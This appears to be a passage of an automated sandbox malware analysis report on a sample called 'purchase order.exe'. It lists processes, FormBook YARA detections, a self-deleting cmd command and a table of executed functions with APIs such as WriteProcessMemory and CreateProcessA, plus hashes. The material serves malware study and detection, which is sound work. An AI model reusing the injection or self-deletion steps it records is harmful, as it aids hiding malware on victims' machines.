                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: msdt.exe PID: 6468 Parent PID: 3440

                                                    General

                                                    Start time:08:35:15
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\SysWOW64\msdt.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                                    Imagebase:0xf60000
                                                    File size:1508352 bytes
                                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 6508 Parent PID: 6468

                                                    General

                                                    Start time:08:35:19
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\purchase order.exe'
                                                    Imagebase:0x2a0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 6476 Parent PID: 6508

                                                    General

                                                    Start time:08:35:19
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff61de10000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: purchase order.exe PID: 3900 Parent PID: 5904 purchase order.exeCOMMON

                                                      Executed Functions

                                                      Function 06A2A4C0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 06A2A67C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 2645101109-3232529671
                                                      • Opcode ID: 2c17564c75dec0ff8da15ecaf9895df78e8179b3a9d397fea9ea4da4cfdc7f2a
                                                      • Instruction ID: 4a42320a7a37a9a791354f529047182dfb1955bde02d5d2873e52b204b892472
                                                      • Opcode Fuzzy Hash: 2c17564c75dec0ff8da15ecaf9895df78e8179b3a9d397fea9ea4da4cfdc7f2a
                                                      • Instruction Fuzzy Hash: BD71DE74E042298FDB64DFA9C880BDEFBF1BB49304F108169E519AB350DB749885CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2A755, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: FindWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 134000473-3232529671
                                                      • Opcode ID: 2c2368f8f88cde7b1ba6dca77af45c5f07f62969167d5678793e7b1ad400cb70
                                                      • Instruction ID: de86b840ca240c0ca455102a50085701c9214e251fb01768a064cc86fd7f3c50
                                                      • Opcode Fuzzy Hash: 2c2368f8f88cde7b1ba6dca77af45c5f07f62969167d5678793e7b1ad400cb70
                                                      • Instruction Fuzzy Hash: 87410EB4D003599FDB50DFA9D884B9EFBF1BB49314F20812AE814BB240D7749886CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2A760, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: FindWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 134000473-3232529671
                                                      • Opcode ID: 5803c5e2a56ffea4f299eb330d1a8b8e1e0d14a1e7c1b13c28ac943577a1e566
                                                      • Instruction ID: 887ac7f161a16797a30d71dd665e906215b097c13a786a554ea1cfe7720ccf4d
                                                      • Opcode Fuzzy Hash: 5803c5e2a56ffea4f299eb330d1a8b8e1e0d14a1e7c1b13c28ac943577a1e566
                                                      • Instruction Fuzzy Hash: AF41FEB0D003599FDB50DFA9D884B9EFBF1BB49314F20852AE914BB240D7749886CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B10B88, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02B10C45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: A8y&
                                                      • API String ID: 1778838933-73667374
                                                      • Opcode ID: 6e44154f7f5cfdd36496f52575296f5f1615447eb1b3cf146981b1688dca7b03
                                                      • Instruction ID: 6dc4680ea9f880cca0c503086d3034a9da3ba92af2c7b81329173a97248ded24
                                                      • Opcode Fuzzy Hash: 6e44154f7f5cfdd36496f52575296f5f1615447eb1b3cf146981b1688dca7b03
                                                      • Instruction Fuzzy Hash: BB4166B9D042589FCF14CFA9D984ADEFBB1BB59310F10906AE818B7310D335A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1015C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02B10C45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: A8y&
                                                      • API String ID: 1778838933-73667374
                                                      • Opcode ID: f82df142f8cf20730b4f5a3ac9ed8acbcc35a3f3b9ff67399535ffa48702eb7f
                                                      • Instruction ID: ff77138aea03be8d542bd5997f11c133561ade35ba7084cc1ff92acb862d241c
                                                      • Opcode Fuzzy Hash: f82df142f8cf20730b4f5a3ac9ed8acbcc35a3f3b9ff67399535ffa48702eb7f
                                                      • Instruction Fuzzy Hash: 1B4174B9E042589FCF10CFAAD984ADEFBB5BB59310F10906AE818B7310D335A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A25470, Relevance: 2.9, Strings: 2, Instructions: 412COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 91d18456dc9134864c42a0aec6d6a56de1ff852fc9d9dd4154751d889b67615d
                                                      • Instruction ID: 7967de3a31d66b2e2e1c66fccdca69077073081c10707dcd4e2b904c5af38c54
                                                      • Opcode Fuzzy Hash: 91d18456dc9134864c42a0aec6d6a56de1ff852fc9d9dd4154751d889b67615d
                                                      • Instruction Fuzzy Hash: 3D020670D50229CFDB60DFA9C885BDDBBB1BF48314F1085AAD809BB250EB709A85CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A262A0, Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: e72b2bd4908a986e003d30760992bf67844136c6a9113d4d0ef6a76e751f51bd
                                                      • Instruction ID: 42b10bf5ef22e48085243490777b6a3e1f87838f77a066672ff22906354b6e68
                                                      • Opcode Fuzzy Hash: e72b2bd4908a986e003d30760992bf67844136c6a9113d4d0ef6a76e751f51bd
                                                      • Instruction Fuzzy Hash: 12F10370D01229CFDB64DFA9C981BDDBBF1BF49304F1095AAD809A7250EB349A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A27C90, Relevance: 2.9, Strings: 2, Instructions: 386COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 27bea2a7134045878768f3c371d40eeecaf983a743bb4caea20c1c1b37e6a2da
                                                      • Instruction ID: d33496a909379f0efad9323dd1820513eb79db24ef9f110e27afe1644066d591
                                                      • Opcode Fuzzy Hash: 27bea2a7134045878768f3c371d40eeecaf983a743bb4caea20c1c1b37e6a2da
                                                      • Instruction Fuzzy Hash: 52F11874E002198FCB14DFA8C880AAEBBB1FF49314F15855AE519AB351DB34A946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2ACA0, Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$$
                                                      • API String ID: 0-187035826
                                                      • Opcode ID: 34d4ef535dc873fc41199fee7a9cca8de7e8cc9661988da19e5786a97ea52ef7
                                                      • Instruction ID: 563cd0c31ff103136a9cc1108865845d628ed91e4873f412fd0ede0e3e8ea291
                                                      • Opcode Fuzzy Hash: 34d4ef535dc873fc41199fee7a9cca8de7e8cc9661988da19e5786a97ea52ef7
                                                      • Instruction Fuzzy Hash: 4191D670D4522ACFDB64DF69C884BD9B7B2BF89304F1081EAD519A7240EB749AC5CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B10470, Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-3285150910
                                                      • Opcode ID: f8349b108c95a6a1b09c0bd7a28aed03ae18c25394627e74af90b2fc73cf0ae8
                                                      • Instruction ID: 630aa29f9eece7cdf3682c000ad1a0b5c8b734e7cf10b493d64050b5ee4ac5fc
                                                      • Opcode Fuzzy Hash: f8349b108c95a6a1b09c0bd7a28aed03ae18c25394627e74af90b2fc73cf0ae8
                                                      • Instruction Fuzzy Hash: 9361E374D01208DFCB18EFA5E5896ADFBB1FF89305F10886AE816A7358D7345A81CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B10931, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \CV{
                                                      • API String ID: 0-4185198329
                                                      • Opcode ID: c2741f321fbfe377f3548984bdfa95eadb801f1e4836e490fe0440c55b09962d
                                                      • Instruction ID: e26b3258dd60f5cee1d43e3ed1186da5b1a82394126658f796a443b51d2ee5d8
                                                      • Opcode Fuzzy Hash: c2741f321fbfe377f3548984bdfa95eadb801f1e4836e490fe0440c55b09962d
                                                      • Instruction Fuzzy Hash: 4751F471E14609CFCB18DFE9D9505DDBBB2FF88304F24962AD419A7218EB306992CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B10940, Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \CV{
                                                      • API String ID: 0-4185198329
                                                      • Opcode ID: 889717157dde6bb264acdbae2c63fbd11125a16c63f14051ed477de75f06d947
                                                      • Instruction ID: 6111493b9319d1820058a9c673d5346df11ae0c27f363fe6a1e7a4ea69541002
                                                      • Opcode Fuzzy Hash: 889717157dde6bb264acdbae2c63fbd11125a16c63f14051ed477de75f06d947
                                                      • Instruction Fuzzy Hash: FC510771E14609CBCB18DFE9D9505DDFBB6FF89300F20962AD419A7258EB306992CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B17C71, Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hs0f
                                                      • API String ID: 0-4076217447
                                                      • Opcode ID: 860d5f73b849965f5cf786f835def71b37f33498d58bc97d8edeb46ff1dfe836
                                                      • Instruction ID: a66e7a66b0021762511d0cbb0d1cacb942ade52973298702e23732e6946b802e
                                                      • Opcode Fuzzy Hash: 860d5f73b849965f5cf786f835def71b37f33498d58bc97d8edeb46ff1dfe836
                                                      • Instruction Fuzzy Hash: 2F317C70E09208EFDB48CFA4C54469EFBB2EBCD340F64D4AA841AA3358DB348B41DB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B17C80, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hs0f
                                                      • API String ID: 0-4076217447
                                                      • Opcode ID: 5d2e31513b918a4781e920bc80e9e395ae6e01128b8ee90664181cb8b11b46b9
                                                      • Instruction ID: 60d37aa4fbb0c60c20c0123515e22bb3a23337de475f5d440745e28198d11b3f
                                                      • Opcode Fuzzy Hash: 5d2e31513b918a4781e920bc80e9e395ae6e01128b8ee90664181cb8b11b46b9
                                                      • Instruction Fuzzy Hash: 92314C70E09208EFDB48CFA5D54459EFBB2EBCE240F64D4E9841AA7358DB349B41DB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1CB7C, Relevance: .2, Instructions: 233COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f31d22453c189a1aea62014b2296087207db878a36f6cab72cb4703b687872a5
                                                      • Instruction ID: 87473904b3f1b91040cbac4d3425d73baedbcb0bd2dabe830c5db238741dd487
                                                      • Opcode Fuzzy Hash: f31d22453c189a1aea62014b2296087207db878a36f6cab72cb4703b687872a5
                                                      • Instruction Fuzzy Hash: 6891A335E003199FCB04DBE0D8549EDBBBAFF89304F548659E416AB7A0EB70A945CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1FBF8, Relevance: .2, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46b79221349bca1ec6eddc4e67e8bb5eed35abb89f862a6b353619768d8f0b0d
                                                      • Instruction ID: 406ac4a018721951d00e9299df06a64b260b5e2e51c6f66371e801022afa58e9
                                                      • Opcode Fuzzy Hash: 46b79221349bca1ec6eddc4e67e8bb5eed35abb89f862a6b353619768d8f0b0d
                                                      • Instruction Fuzzy Hash: FB81B035E003198FCB04DFE0D8549EDBBBAFF89304F248615E416AB7A4EB70A945CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B18541, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02B185B0
                                                      • GetCurrentThread.KERNEL32 ref: 02B185ED
                                                      • GetCurrentProcess.KERNEL32 ref: 02B1862A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02B18683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID: A8y&
                                                      • API String ID: 2063062207-73667374
                                                      • Opcode ID: 2a5031528f497b1a2472a7463d42457c58cd459a6e83d9650caf9fad3fd12255
                                                      • Instruction ID: 47b9e726cbf968f2ae0f0862ae59a182d3a7d075144709d9a77ddfc688019c01
                                                      • Opcode Fuzzy Hash: 2a5031528f497b1a2472a7463d42457c58cd459a6e83d9650caf9fad3fd12255
                                                      • Instruction Fuzzy Hash: 195133B49106458FEB14DFA9D988BDEBBF1FF48314F208599E019A73A0C7749884CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B18550, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02B185B0
                                                      • GetCurrentThread.KERNEL32 ref: 02B185ED
                                                      • GetCurrentProcess.KERNEL32 ref: 02B1862A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02B18683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID: A8y&
                                                      • API String ID: 2063062207-73667374
                                                      • Opcode ID: ad012c089d990310c269bc9e1cfce95b45d30d7fdffb803ff3533a153dc8d1f2
                                                      • Instruction ID: 50f7d382d1b0c3b6e4b96c0ba9cd20fb119df98f6f542cd4b1d4fa915d1edb3a
                                                      • Opcode Fuzzy Hash: ad012c089d990310c269bc9e1cfce95b45d30d7fdffb803ff3533a153dc8d1f2
                                                      • Instruction Fuzzy Hash: DF5134B09106498FEB14CFA9D948B9EBBF5FF48314F208499E019A7390C774A884CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE878, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 321processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 063AEB3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 963392458-3232529671
                                                      • Opcode ID: 4933df63a277d9a1495c622da1b32a129e9da15ccf1cfee59d72c864162878a1
                                                      • Instruction ID: d4bbc3f27181a9ad5b9f9af8d569f58d828411cf6b6fbc969307b3a8121bcffc
                                                      • Opcode Fuzzy Hash: 4933df63a277d9a1495c622da1b32a129e9da15ccf1cfee59d72c864162878a1
                                                      • Instruction Fuzzy Hash: FFC13571D002298FDB60DFA4C880BEDBBB1FF49304F0085A9E559B7240DB749A89EF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2A430, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 06A2A67C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 2645101109-3232529671
                                                      • Opcode ID: b71cb13be7f0b3ab784cd4d686c0ca596355b4c615b69837a367d12519d6df91
                                                      • Instruction ID: 928b51ebd32dd59025b48fbdf81458d55bcdfe8427e0919184b61ead0809a238
                                                      • Opcode Fuzzy Hash: b71cb13be7f0b3ab784cd4d686c0ca596355b4c615b69837a367d12519d6df91
                                                      • Instruction Fuzzy Hash: 96A15474D4A299DFDB11DFA9C880BEEBBB0BB49300F14846AE555AB342C7309945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1F7D8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1F999
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 716092398-3232529671
                                                      • Opcode ID: 7869ad0a70613c2a8b39cae0304f90c0abe5bfc3708f7b1cbded24976014b192
                                                      • Instruction ID: fe0978e53e3b36da9e19a7fe9db080feeb17ae8d5ad116e14ead496906373bc4
                                                      • Opcode Fuzzy Hash: 7869ad0a70613c2a8b39cae0304f90c0abe5bfc3708f7b1cbded24976014b192
                                                      • Instruction Fuzzy Hash: D6719AB4D04218DFDF20CFA9D884BDDBBB1BB09304F5491AAE808A7211D730AA85CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1F7CD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1F999
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 716092398-3232529671
                                                      • Opcode ID: 1a0cec5711a3d32dccbaa51469f16bc97de4eda8853652c4404ea23b250a2142
                                                      • Instruction ID: 2624c052c7a566d9578f1b4003dcf989081e43fa738a1f31982d2492fac7321c
                                                      • Opcode Fuzzy Hash: 1a0cec5711a3d32dccbaa51469f16bc97de4eda8853652c4404ea23b250a2142
                                                      • Instruction Fuzzy Hash: A57198B4D00218DFDF20CFA9D984BDDBBB1BB09304F5491AAE818B7221D734AA85CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A21B54, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(?), ref: 06A21C48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 1029625771-3232529671
                                                      • Opcode ID: 23e74965ba234978ded2647568d5036876c160e49f8b0770e19899fff0933fb9
                                                      • Instruction ID: 68dc553ba3d808881f287719f3d2a8d88088776c0fdfb5bebb6d917e703b0c9d
                                                      • Opcode Fuzzy Hash: 23e74965ba234978ded2647568d5036876c160e49f8b0770e19899fff0933fb9
                                                      • Instruction Fuzzy Hash: 924120B4D002698FDB14DFA9D985BDDBBF1BB48714F10812AE814AB340D774A845CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A21B60, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(?), ref: 06A21C48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 1029625771-3232529671
                                                      • Opcode ID: 531af27ca0ff019aea33f672486581b903fdf388265147595247536cff141c05
                                                      • Instruction ID: e8a87890fca3a1df487d820cf741065cd220c3556f6d91254fb8b3dbb70d67ac
                                                      • Opcode Fuzzy Hash: 531af27ca0ff019aea33f672486581b903fdf388265147595247536cff141c05
                                                      • Instruction Fuzzy Hash: 59411FB4D042698FDB54DFA9D884BDEFBF1BB49714F10812AE814AB340D774A845CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1D5A8, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(?), ref: 02B1D82A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID: A8y&
                                                      • API String ID: 4139908857-73667374
                                                      • Opcode ID: 212cd17a4a07d00181e5124cd72a7fab1f1697600119611a48e662783b315205
                                                      • Instruction ID: 8ecb1c248d813af45530d8bad3f2a1fdc837419c87ae7dd42ba1d02e18d5b48f
                                                      • Opcode Fuzzy Hash: 212cd17a4a07d00181e5124cd72a7fab1f1697600119611a48e662783b315205
                                                      • Instruction Fuzzy Hash: 589112B0A00B059FDB24DF69D584B9ABBF1FF48204F00896AE45AE7750DB34E845CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE460, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 063AE533
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID: A8y&
                                                      • API String ID: 3559483778-73667374
                                                      • Opcode ID: c535fcc01fcbe58676b76afa6e5edb30a3a07b9d570d60551089a75800d8f330
                                                      • Instruction ID: 9735f991d865fe77ec22f75bc8a829bcd1b26d2af75b702d997a74b764c288df
                                                      • Opcode Fuzzy Hash: c535fcc01fcbe58676b76afa6e5edb30a3a07b9d570d60551089a75800d8f330
                                                      • Instruction Fuzzy Hash: 174199B5D012589FCF00CFA9D984AEEFBF1BB49314F24902AE814B7200D734AA45DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B18771, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B18843
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID: A8y&
                                                      • API String ID: 3793708945-73667374
